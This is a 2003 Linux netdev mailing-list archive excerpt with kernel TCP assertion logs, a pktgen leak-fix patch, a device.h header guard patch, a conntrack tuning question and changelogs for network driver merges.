> is a delink). 
> > Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 06:31:00 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 18:27:53 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 18:27:53 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 20:52:35 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 20:52:35 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 21:52:16 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 21:52:16 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 22:49:31 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 22:49:31 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > > OR > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: 
assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:59 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:59 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:59 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > > > If I do a rollback, no more problems... I don't test yet a 2.4.21 kernel. > > Hardware is a Dell PowerAppWeb 120A with one CPU P3 1 GHz / 256 Mo RAM / > > Now Kernel is generated under debian with kernel-source-2.4.20-2 and gcc > version 2.95.4 20011002. > > Any idea? (Thanks for your help) > > -- > Cedric Gavage > http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 > > > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ From kambo77@hotmail.com Sat Jul 19 10:34:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 10:35:03 -0700 (PDT) Received: from hotmail.com (sea2-f21.sea2.hotmail.com [207.68.165.21]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JHYuFl012782 for ; Sat, 19 Jul 2003 10:34:57 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 19 Jul 2003 10:34:51 -0700 Received: from 24.98.138.238 by sea2fd.sea2.hotmail.msn.com with HTTP; Sat, 19 Jul 2003 17:34:51 GMT X-Originating-IP: [24.98.138.238] X-Originating-Email: [kambo77@hotmail.com] From: "Kambo Lohan" To: Robert.Olsson@data.slu.se Cc: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: PATCH pktgen hang, memleak, fixes Date: Sat, 19 Jul 2003 13:34:51 -0400 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 19 Jul 2003 17:34:51.0628 (UTC) FILETIME=[0F1F82C0:01C34E1C] X-archive-position: 4176 X-ecartis-version: 
Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kambo77@hotmail.com Precedence: bulk X-list: netdev That patch is bad please use the updated patch ([PATCH] [UPDATED] pktgen fixes on netdev)....I will attempt to repost while snipping the whitespace change >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> --- linux-2.4.21/net/core/pktgen.c 2002-11-28 18:53:15.000000000 -0500 +++ linux-2.4-kjp/net/core/pktgen.c 2003-07-10 13:22:17.000000000 -0400 @@ -34,6 +34,7 @@ * * The new changes seem to have a performance impact of around 1%, * as far as I can tell. * --Ben Greear + * Fix refcount off by one if first packet fails, potential null deref, memleak 030710- KJP * * Renamed multiskb to clone_skb and cleaned up sending core for two distinct * skb modes. A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 @@ -84,9 +85,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -613,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -626,7 +626,9 @@ spin_lock_bh(&odev->xmit_lock); if (!netif_queue_stopped(odev)) { + atomic_inc(&skb->users); if (odev->hard_start_xmit(skb, odev)) { + atomic_dec(&skb->users); if (net_ratelimit()) { printk(KERN_INFO "Hard xmit error\n"); } @@ -731,6 +733,8 @@ (unsigned long long) info->errors ); } + + kfree_skb(skb); out_reldev: if (odev) { _________________________________________________________________ The new MSN 8: advanced junk mail protection and 2 months FREE* 
http://join.msn.com/?page=features/junkmail From jmorris@intercode.com.au Sat Jul 19 16:53:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 16:53:24 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:8JfO1ALy1UG9cFG9Asj8QTou6t+/Bk/h@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JNr0Fl000555 for ; Sat, 19 Jul 2003 16:53:02 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6JNqXr10590; Sun, 20 Jul 2003 09:52:34 +1000 Date: Sun, 20 Jul 2003 09:52:33 +1000 (EST) From: James Morris To: Jim Keniston cc: Andrew Morton , , , , , , , Subject: Re: [PATCH] [1/2] kernel error reporting (revised) In-Reply-To: <3F1882CF.538FE76@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4177 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Fri, 18 Jul 2003, Jim Keniston wrote: > > Yes, this makes sense. At the kerror.c level, just return -EDEADLK if in_irq(). > > Delay packet delivery (via a tasklet, as before) at the evlog.c level instead. > > That way, we know at the evlog.c level (in the tasklet) whether the event packet > > was delivered to anybody, and can paraphrase it to printk if it wasn't. > > > > Is this the sort of thing you had in mind? Not exactly -- I don't think the logging framework should do any irq detection. The caller should either know if it's in an interrupt, or do the detection itself. 
- James -- James Morris From carlos@fisica.ufpr.br Sat Jul 19 17:10:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 17:10:48 -0700 (PDT) Received: from fisica.ufpr.br (fisica.ufpr.br [200.17.209.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K0AhFl001842 for ; Sat, 19 Jul 2003 17:10:44 -0700 Received: by fisica.ufpr.br (Postfix) id 984422216C2; Sat, 19 Jul 2003 21:10:41 -0300 (BRT) From: Carlos Carvalho MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <16153.56832.379224.202834@fisica.ufpr.br> Date: Sat, 19 Jul 2003 21:10:40 -0300 To: netdev@oss.sgi.com Subject: Re: Memory usage for ip_conntrack In-Reply-To: <1058563690.26030.23.camel@tux.rsn.bth.se> References: <1058558848.2674.88.camel@mentor.gurulabs.com> <1058563690.26030.23.camel@tux.rsn.bth.se> X-Mailer: VM 7.07 under Emacs 19.34.1 X-archive-position: 4178 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlos@fisica.ufpr.br Precedence: bulk X-list: netdev Martin Josefsson (gandalf@wlug.westbo.se) wrote on 18 July 2003 23:28: >> If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst >> case memory usage? > >Don't do this. This will increase the maximum number of connections it >will track, but not the number of buckets. Which means that it will be >slower due to longer collision-chains. Instead increase the number of >buckets. modprobe ip_conntrack hashsize=131072 (or any number here. How can we increase the number of buckets with a monolithic kernel? 
From davem@redhat.com Sat Jul 19 19:27:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 19:27:41 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K2RVFl008977 for ; Sat, 19 Jul 2003 19:27:32 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA31339; Sat, 19 Jul 2003 19:17:23 -0700 Date: Sat, 19 Jul 2003 19:17:23 -0700 From: "David S. Miller" To: Alan Cox Cc: netdev@oss.sgi.com, cedric.gavage@unixtech.be Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030719191723.0821227f.davem@redhat.com> In-Reply-To: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4179 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 19 Jul 2003 18:05:45 +0100 Alan Cox wrote: > > Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != > > TCP_SYN_RECV) failed at tcp.c(2229) This one was fixed in 2.4.21 From tgr@reeler.org Sat Jul 19 19:55:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 19:55:41 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K2taFl010762 for ; Sat, 19 Jul 2003 19:55:37 -0700 Received: by reeler.org id 19e4MD-0007Pb-00 for ; Sun, 20 Jul 2003 04:55:29 +0200 Date: Sun, 20 Jul 2003 04:55:29 +0200 From: Thomas Graf To: netdev@oss.sgi.com Subject: [PATCH] missing __KERNEL__ ifdef in include/linux/device.h Message-ID: <20030720025528.GA30577@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; 
charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 4180 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello device.h should be protected with __KERNEL__ because it uses __KERNEL__ protected structures. Userspace applications including if_arp.h such as iproute2 will fail because it finally includes device.h as well. - thomas Index: include/linux/device.h =================================================================== RCS file: /cvs/tgr/linux-25/include/linux/device.h,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 device.h --- include/linux/device.h 10 Jul 2003 22:58:31 -0000 1.1.1.2 +++ include/linux/device.h 20 Jul 2003 02:49:12 -0000 @@ -8,7 +8,7 @@ * See Documentation/driver-model/ for more information. */ -#ifndef _DEVICE_H_ +#if defined __KERNEL__ && !defined _DEVICE_H_ #define _DEVICE_H_ #include From garzik@gtf.org Sat Jul 19 20:29:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 20:30:13 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K3TnFl012645 for ; Sat, 19 Jul 2003 20:29:50 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 8E7086653; Sat, 19 Jul 2003 23:29:43 -0400 (EDT) Date: Sat, 19 Jul 2003 23:29:43 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] more 2.4.x net driver merges Message-ID: <20030720032943.GA12272@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4181 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev (just sent to Marcelo; he already 
merged an earlier batch) BK users may do a bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.4 Others may download the patch from ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.4/2.4.22-pre7-netdrvr3.patch.bz2 This will update the following files: Documentation/networking/ifenslave.c | 90 +++- drivers/net/wireless/airo.c | 663 ++++++++++++++++++++--------------- 2 files changed, 455 insertions(+), 298 deletions(-) through these ChangeSets: (03/07/19 1.1032) [bonding] fix ifenslave ABI bug (03/07/19 1.1031) [wireless airo] Update to wireless extensions 16 (new spy API). (03/07/19 1.1030) [wireless airo] Update to wireless extensions 15 (add monitor mode). (03/07/19 1.1029) [wireless airo] Return channel in infrastructure mode. (03/07/19 1.1028) [wireless airo] Checks for small packets before transmitting them. (03/07/19 1.1027) [wireless airo] Returns proper status in case of transmission error. (03/07/19 1.1026) [wireless airo] Fix small endianness bug. (03/07/19 1.1025) [wireless airo] Don't call MIC functions if the card doesn't support them. (03/07/19 1.1024) [wireless airo] Don't sleep when the stats are requested. (03/07/19 1.1023) [wireless airo] Make locking "per thread" so it's fully preemptive. (03/07/19 1.1022) [wireless airo] Update structs with the new fields in latest firmwares. (03/07/19 1.1021) [wireless airo] Simplify dynamic buffer code in Cisco extensions. (03/07/19 1.1020) [wireless airo] sync with 2.6 Trivialities: spelling, stack usage, checking return vals, etc. 
From garzik@gtf.org Sat Jul 19 21:39:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:40:12 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4dsFl015989 for ; Sat, 19 Jul 2003 21:39:54 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id ADD08663B; Sun, 20 Jul 2003 00:39:48 -0400 (EDT) Date: Sun, 20 Jul 2003 00:39:48 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Cc: torvalds@osdl.org Subject: [BK PATCHES] more 2.6.x net driver merges Message-ID: <20030720043948.GA20201@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4182 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Added some more stuff at bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.6 Others may download the patch from ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.6/2.6.0-test1-netdrvr2.patch.bz2 This will update the following files: Documentation/networking/ifenslave.c | 346 +- MAINTAINERS | 4 drivers/net/8139too.c | 4 drivers/net/b44.c | 54 drivers/net/b44.h | 2 drivers/net/e1000/e1000_ethtool.c | 101 drivers/net/e1000/e1000_main.c | 2 drivers/net/ne2k-pci.c | 1 drivers/net/pcmcia/3c574_cs.c | 3 drivers/net/sk_mca.c | 17 drivers/net/sk_mca.h | 1 drivers/net/via-rhine.c | 17 drivers/net/wan/Kconfig | 3 drivers/net/wireless/Kconfig | 10 drivers/net/wireless/Makefile | 2 drivers/net/wireless/airo.c | 510 +-- drivers/net/wireless/wl3501.h | 1764 +++++++--- drivers/net/wireless/wl3501_cs.c | 5616 ++++++++++++++++++++++++----------- include/linux/ethtool.h | 2 19 files changed, 5835 insertions(+), 2624 deletions(-) through these ChangeSets: (03/07/19 1.1548) [wireless airo] fix 2.4-isms that 
break build (03/07/19 1.1547) [bonding] sync ifenslave with 2.4 (pulls in several bug fixes) (03/07/19 1.1546) [wireless airo] Update to wireless extensions 16 (new spy API). (03/07/19 1.1545) [wireless airo] Update to wireless extensions 15 (add monitor mode). (03/07/19 1.1544) [wireless airo] Return channel in infrastructure mode. (03/07/19 1.1543) [wireless airo] Checks for small packets before transmitting them. (03/07/19 1.1542) [wireless airo] Returns proper status in case of transmission error. (03/07/19 1.1541) [wireless airo] Fix small endianness bug. (03/07/19 1.1540) [wireless airo] Don't call MIC functions if the card doesn't support them. (03/07/19 1.1539) [wireless airo] Don't sleep when the stats are requested. (03/07/19 1.1538) [wireless airo] Make locking "per thread" so it's fully preemptive. (03/07/19 1.1537) [wireless airo] Update structs with the new fields in latest firmwares. (03/07/19 1.1536) [wireless airo] Simplify dynamic buffer code in Cisco extensions. (03/07/19 1.1535) [PATCH] 3c574_cs initialise spinlock This patch against 2.5.75 initialises a spinlock when the structure containing it is allocated (03/07/19 1.1534) [PATCH] Software suspend and RTL 8139too in 2.6.0-test1 This patch is needed to make software suspend work with the 8139too driver loaded. (03/07/19 1.1533) [PATCH] via-rhine 1.19-2.5: One more Rhine-I fix This patch fixes another way the Rhine-I found to break down under load. It should bring Rhine-I behavior on par with the Rhine-II. (03/07/19 1.1532) [PATCH] sk_mca (03/07/19 1.1531) [PATCH] Add ethtool TSO, Rx/Tx csum, SG Get/Set support * Add ethtool TSO, Rx/Tx csum, SG Get/Set support. (03/07/19 1.1530) [PATCH] add ethtool TSO get/set * Add TSO get/set command to ethtool interface. Applies to both 2.4/2.5. Ethtool application patch sent under separate cover. (03/07/19 1.1529) [PATCH] mark comx obsolete, by request (03/07/19 1.1528) [PATCH] fix ne2k-pci memleak ne2k-pci leaks memory on unload. 
dev->priv is allocated in ethdev_init(), but never freed. against 2.4-bk, but also applies to 2.5-bk with offset. (03/07/19 1.1527) [netdrvr b44] tons of fixes. should work now. (03/07/19 1.1525) [netdrvr wan] update comx maintainer, by request Previous entry said to be out of date by two years or more. (03/07/18 1.1310.96.56) o wl3501: cleanup types (03/07/18 1.1310.96.55) o wl3501: slow_down_io exists only on __i386__ The joys of having several arches at my home lab, thanks to parisc this time. (03/07/17 1.1310.96.54) o wl3501: first cut at power management support (03/07/17 1.1310.96.53) o wl3501: remove lots of unneeded casts (03/07/17 1.1310.96.52) o wl3501: create iw_default_channel Also aimed at being moved to the core wireless extensions code. (03/07/17 1.1310.96.51) o wl3501: create iw_valid_channel To validate if a channel is OK in a specific regulatory domain, I prefixed it with iw_ as I plan to move this stuff to the main wireless extensions code, ditto for the next changeset, where I'll introduce iw_chan2freq and iw_default_channel. (03/07/17 1.1310.96.50) o wl3501: use more c99 style struct initializers (03/07/16 1.1310.96.49) o wl3501: keep it simple, support only ARPHRD_ETHER packets (03/07/16 1.1310.96.48) o wl3501: nuke def_chan, useless But I still didn't manage to change the channel on the firmware... will implement wl3501_set_mib_value... (03/07/16 1.1310.96.47) o wl3501: use c99 init style for the signals also remove some unneeded casts. (03/07/15 1.1310.96.46) o wl3501: create wl3501_esbq_exec to avoid cut'n'paste in several functions (03/07/15 1.1310.96.45) o wl3501: use the regulatory domain defines I.e. less magic numbers, also rename freq_domain to reg_domain, as in regulatory domain, as the atmel driver does, and that made me realize that these defines and the function that checks if a channel is valid in a regulatory domain should be moved to the wireless extensions (or some other place) common code.
(03/07/15 1.1310.96.44) o wl3501: remove llc_type stuff, not used (03/07/09 1.1310.96.43) o wl3501: remove duplicate assignment of link->irq.IRQInfo2 (03/07/07 1.1310.96.42) o wl3501: kill wl3501_mac_addr, to follow the de-facto standard for mac addrs (03/07/07 1.1310.96.41) o wl3501: kill wl3501_80211_data_mac_hdr, we already have ieee802_11_hdr (03/07/07 1.1310.96.40) o wl3501: argh, WL3501_MIB_ATTR_{SHORT,LONG}_RETRY_LIMIT is u8 (03/07/07 1.1310.96.39) o wl3501: fix some mib variables sizes Following what is in the 802.11 specs and doing experimentations. (03/07/07 1.1310.96.38) o wl3501: remove dead code that was surviving from original driver It never was used for anything meaningful, i.e. driver_state never is set to non zero. (03/07/06 1.1310.96.37) o wl3501: kill magic numbers in cap_info, fix bss_type setting it was only setting INFRA mode... (03/07/06 1.1310.96.36) o wl3501: kill WL3501_SLOW_DOWN_IO, use slow_down_io() instead Also fix some loop variables use, one of which potentially is related to ADHOC not working, i.e. it was not being properly initialized, thanks to gcc 3.3.1 (pre-release) and this was caught... (03/07/06 1.1310.96.35) o wl3501: remove more unused code in wl3501.h will be back in some way with iwpriv support. (03/07/02 1.1310.96.34) o wl3501: remove commented out code Will get back to this at some point. (03/07/02 1.1310.96.33) o wl3501: revert the change to get_encode wrt priv_opt_implemented It turns out that the first implementation of get_encode was right wrt checking WL3501_MIB_ATTR_PRIV_OPT_IMPLEMENTED, according to the "802.11 Wireless Networks - The Definitive Guide" O'Reilly book, so, put it back in. (03/07/02 1.1310.96.32) o wl3501: kill a race in wl3501_get_mib_value and more . collect statistics in wl3501_get_wireless_stats .
WL3501_MIB_ATTR_PRIV_OPT_IMPLEMENTED doesn't seem to be related to WEP, remove its test in get_encode (03/07/01 1.1310.96.31) o wl3501: implement get retry wireless extension (03/07/01 1.1310.96.30) o wl3501: implement get tx power wireless extension (03/07/01 1.1310.96.29) o wl3501: implement get power wireless extension Now to study how to enable power management. (03/07/01 1.1310.96.28) o wl3501: implement get encode wireless extension . Well, this is just for completeness, as with this specific firmware in the cards I have WEP is not implemented... This is the information for the cards I have (tested just one but I doubt the others have WEP...): Card Name: OEM WLAN/WPCMCIA Firmware Date: 02.00.06 01/07/2000 12:13:49 (03/07/01 1.1310.96.27) o wl3501: implement get frag threshold wireless extension (03/07/01 1.1310.96.26) o wl3501: use the MIB stuff in this card, add one more wireless extension . Using the MIB in the card I'm now able to find lots of useful information that will get used in more support for wireless extensions. . Also some cleanups wrt ifdefing the code not yet used to write into the flash of this card and some more messages tidy up. (03/07/01 1.1310.96.25) o wl3501: use offsetof(struct wl3501_{rx,tx}_hdr, addr4) in more places (03/07/01 1.1310.96.24) o wl3501: merge some bits from yet another fork of the original sources This time from work done by Heiko Kirschke, and also do some simplification wrt access to ->addr4 in tx headers, i.e. use offsetof and do just one wl3501_set_to_wla in wl3501_send_pkt. (03/07/01 1.1310.96.23) o wl3501: initialize link->release timer and use alloc_etherdev (03/07/01 1.1310.96.22) o wl3501: clarify arp type checking in wl3501_md_ind_interrupt Information collected from another driver source found on the net for this hardware, written by magyver@zcom.com.tw, that I'm reading to find more information about this hardware, coalescing several efforts to have a driver for this card.
(03/07/01 1.1310.96.21) o wl3501: update this->rssi at wl3501_md_ind_interrupt Now the sensitivity information in iwconfig is dynamically updated. (03/07/01 1.1310.96.20) o wl3501: finally a sane use for this->def_chan! With this we can finally select in a sane way the channel to use, selectable thru wireless extensions/iwconfig interface freq nr_channel :-) (03/07/01 1.1310.96.19) o wl3501: kill one magic number, introducing WL3501_ESSID_MAX_LEN (03/07/01 1.1310.96.18) o wl3501: the first two chars in this->essid are special . The real BSSID is after the first two bytes, that is why this->bssid has 34 chars when IW_ESSID_MAX_SIZE is just 32... . Include some debug, selectable with the pc_debug kernel module parameter, that is turned off by default. (03/06/30 1.1310.96.17) o wl3501: use wl3501_reset when changing some parameters (03/06/29 1.1310.96.16) o wl3501: first cut at adding set_freq wireless extension This will require further study and probably to include the MIB stuff in the original driver. (03/06/29 1.1310.96.15) o wl3501: implement get_rate wireless extension For now returning a fixed rate of 2 Mbit/s, that is by far the most common for this thing, but perhaps this card can work at 1 Mbit/s and so I have to find out from where to get this info, without documentation coding drivers is, humm, "fun" :-\ (03/06/29 1.1310.96.14) o wl3501: subtract one from this->channel to get the correct frequency (03/06/29 1.1310.96.13) o wl3501: do proper tx throttling . check if queue was stopped when receiving interrupt tx confirmation, prior to calling netif_wake_queue. . stop the queue processing if there is less than 2 tx blocks in the card, with this I get no drops in pktgen, whee! 8) (03/06/29 1.1310.96.12) o wl3501: create channel to frequency table and use it in get_freq This table was obtained from the Planet WAP 1000 Access Point web interface, accessing it over this driver after I ran nmap against the AP box that is now only with the wireless interface, i.e.
all accesses to it are over this driver :-) (03/06/29 1.1310.96.11) o wl3501: remove leftover debug from get_freq (03/06/29 1.1310.96.10) o wl3501: more wireless extensions: {get,set}_nick and get_freq (03/06/29 1.1310.96.9) o wl3501: update tx statistics (03/06/28 1.1310.96.8) o wl3501: restructure netdev handling and kill card_start abomination (03/06/28 1.1310.96.7) o wl3501: implement some more wireless extensions Also reorganize wl3501_card struct a bit to avoid wasting some bytes. This time get_sense and set_wap wireless extensions were added, work in progress, ya know 8) (03/06/28 1.1310.96.6) o wl3501: initial batch of support for wireless extensions and ethtool (03/06/27 1.1310.96.5) o wl3501: tidy up wl3501_ioctl . check if the device is present, bail out if not . move the buffer to the place where it is used . check the size of the firmware buffer passed from userspace . make wl3501_write_flash return -EIO on failure, 0 on success (03/06/27 1.1310.96.4) o wl3501: move some variable declarations to where they are needed (03/06/27 1.1310.96.3) o wl3501: add locking in the interrupt handler (03/06/27 1.1310.96.2) o wl3501: remove stupid loop (03/06/26 1.1310.60.10) o wl3501: remove comment about supporting wireless extensions It will, but is not supporting now, just some basic skeleton is in place. (03/06/26 1.1310.60.9) o wl3501: uncomment spin_lock usage, working well, have to stress this thing more now (03/06/26 1.1310.60.8) o wl3501: disabling the stupid loop for now, working well... (03/06/26 1.1310.60.7) o wl3501: use eth_copy_and_sum, assorted cleanups (03/06/26 1.1310.60.6) o wl3501: fix the bug that prevented us from reliably using MTU ~> WL3501_BLKSZ (03/06/26 1.1310.60.5) o wl3501: reorganization . use enum instead of tons of #defines . put the initial smp locking, still commented out . use some defines for magic numbers . break the rx_interrupt routine in multiple inlines for each signal type . CodingStyle cleanups .
Activated the stupid loop, will now try without it, works? kill this stupidity (03/06/21 1.1310.48.6) o wl3501: new wireless driver for Planet WL 3501 802.11 PCMCIA card After a long while, and with wireless becoming a hot topic, at least for me, I get back to work on this driver, Aristeu, Niemeyer, Marcelino, this will finally be integrated! Whee! :-) From davem@redhat.com Sat Jul 19 21:55:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:55:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4t8Fl017013 for ; Sat, 19 Jul 2003 21:55:08 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA31712; Sat, 19 Jul 2003 21:44:59 -0700 Date: Sat, 19 Jul 2003 21:44:58 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: eis@baty.hanse.de, netdev@oss.sgi.com Subject: Re: [PATCH] Remove MOD_* from LAPB Message-Id: <20030719214458.2ea87a94.davem@redhat.com> In-Reply-To: <20030718133211.1c7ed08d.shemminger@osdl.org> References: <20030718133211.1c7ed08d.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4183 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 13:32:11 -0700 Stephen Hemminger wrote: > The MOD_INC and MOD_DEC in lapb are no longer necessary in 2.6 since > the module subsystem will not allow lapb to be unloaded as long as a module > that is referencing the symbols (lapb_register/lapb_unregister) is loaded. > > The lapb parameter block does have callback's so it is up to the caller > to correctly unregister on module exit; and looking at the existing code > it does do that. 
